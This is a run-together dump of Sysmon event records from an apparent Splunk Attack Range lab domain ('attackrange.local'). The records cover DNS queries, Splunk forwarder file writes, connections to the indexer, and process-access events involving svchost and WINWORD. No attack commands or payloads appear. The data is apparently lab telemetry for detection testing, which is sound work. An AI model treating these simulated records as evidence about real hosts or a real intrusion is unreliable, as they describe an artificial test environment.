ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000441305Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.613{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal62704- 354300x8000000000000000441304Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.590{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal57598- 10341000x8000000000000000441303Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.216{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441302Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.216{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441301Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.198{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5E3258C30D873E72F48119F24D3E140,SHA256=84F5770483A66B51ED6B91E9DEF351CF8E5410891E9DBF5ABD3F5FD07EB150FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441326Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:50.960{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E3979C94158A2DC4767A01D8F96807,SHA256=C30F547451C3F3A62CE10747DB40219D7013AD880C02132B066BCB43675745E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292683Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:47.055{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50639-false69.192.193.125a69-192-193-125.deploy.static.akamaitechnologies.com80http 23542300x8000000000000000292682Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:50.075{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAE2AEA56C5DA321AC7718EE566F9FA7,SHA256=40C5AD721B5B726E83BF635C94812DCD5122A15AE4714C34BFCC05C671D1D3BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441325Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:50.477{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFD301652516350B9DFAEE41B7EBA532,SHA256=67357CF0B51A2AF2FFFF842120E7EB18960EE239B9F96F91BD9E2F167FC11E01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441324Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:50.217{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441323Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:50.217{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441330Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.561{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62419-false10.0.1.12-8000- 354300x8000000000000000441329Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.375{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal54199- 10341000x8000000000000000441328Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:51.218{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441327Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:51.218{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292685Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:51.709{BEA10069-2590-6087-DA0F-00000000BB01}31564272C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292684Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:51.077{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7202A31A6559226F315A826647777A5C,SHA256=75F4FA2AFE7A6EB88EF040A489B26D24CBD6793B970F1F06FFDB0AB690423D23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441333Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:52.219{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441332Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:52.219{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441331Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:52.058{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066F9EE016F6BBABBD734509C5A7635B,SHA256=AB01EC7A6555F8490B497FFD3E9F2D98112A1537864F34D504FC8592F50D5746,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292687Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:52.342{BEA10069-2590-6087-DA0F-00000000BB01}31564272C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292686Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:52.079{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81E0B59B630CBF8A0233F9698B32C176,SHA256=B709826FED8ECDB5E29BE258C6FA4BBA9D43A7A4432032FCF35EDF19EB6A6363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441337Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:53.291{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E78FFB503D03492D2995F84A9FF244,SHA256=8BC282B0037E89A79C7CDE24E206EC8F3103D44B3F77ED1AA6F94475CA6086C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292690Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:51.453{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50640-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000292689Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:53.161{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F70DEE24F8BD0E1D5760B2CDBC26DDB9,SHA256=A25CB20FE23D4DC2D03ACB0A9A5F81B630C31B86D669CF8175E2BE4067719E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292688Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:53.096{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4DDE5B467C113B03974C07111B731C,SHA256=74828BBCFA74609BAF1CDF11B448691D07080BEFB7FE02F627C79241B7285F10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441336Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:53.220{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441335Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:53.220{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441334Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:53.006{42DC5269-CE99-6086-1000-00000000BA01}364NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=7B729193DB7483CA18652C44F280C042,SHA256=7FE98DBDD8AE09D12A5335087399B9867A0694987636FC581A4B23DAEE7C41C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441340Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:54.320{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DC5A8F8B478CD1B5E359255A13E7D03,SHA256=16160332C584F3E0EE452BD94D8EE6FDF10049989E0135FBC78765F47CA516B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292691Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:54.129{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF3B76CF76C8512D2F3426CAE19EFE1F,SHA256=FD6D7381FDC8F0381C5576DF9DDDA1DF8C706D0C2B62BE79F2E32BC716BE4E55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441339Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:54.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441338Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:54.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292692Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:55.147{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5687748B80228AC640732A5867E12421,SHA256=388254636873E630D1602D8FD586E0A550B685F57B61390FB0B4FB08D4B66952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441344Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:55.466{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1D98BB392747273DD3FAA8F05BD330E,SHA256=C13B3FCA609D0400C69E27813B9E8DE9005E5C6E08492B455392ED09B7B1F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441343Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:55.352{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3CB5E7AD85B5F29FA324D1CE5E86EE,SHA256=7BBBDEDB0EED8E034D035CC2C858EEA1F24407505AC874E9393148D3DC52C634,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441342Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:55.222{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441341Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:55.222{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292693Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:56.169{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE0D779C723778979FA51E28D1BFFDEA,SHA256=1183AB90F16ED04602BD62E69DC39DBD7D03DDA29FF157CD398E510D266AF7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441348Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:56.365{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55D516712382BE8B3D0110DF0EC6DC8E,SHA256=3F62778B1B671C7716F9E62D140634EB5BD563377DB75E2B2BD131A1FC0A901B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441347Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:52.684{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62420-false10.0.1.12-8000- 10341000x8000000000000000441346Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:56.223{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441345Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 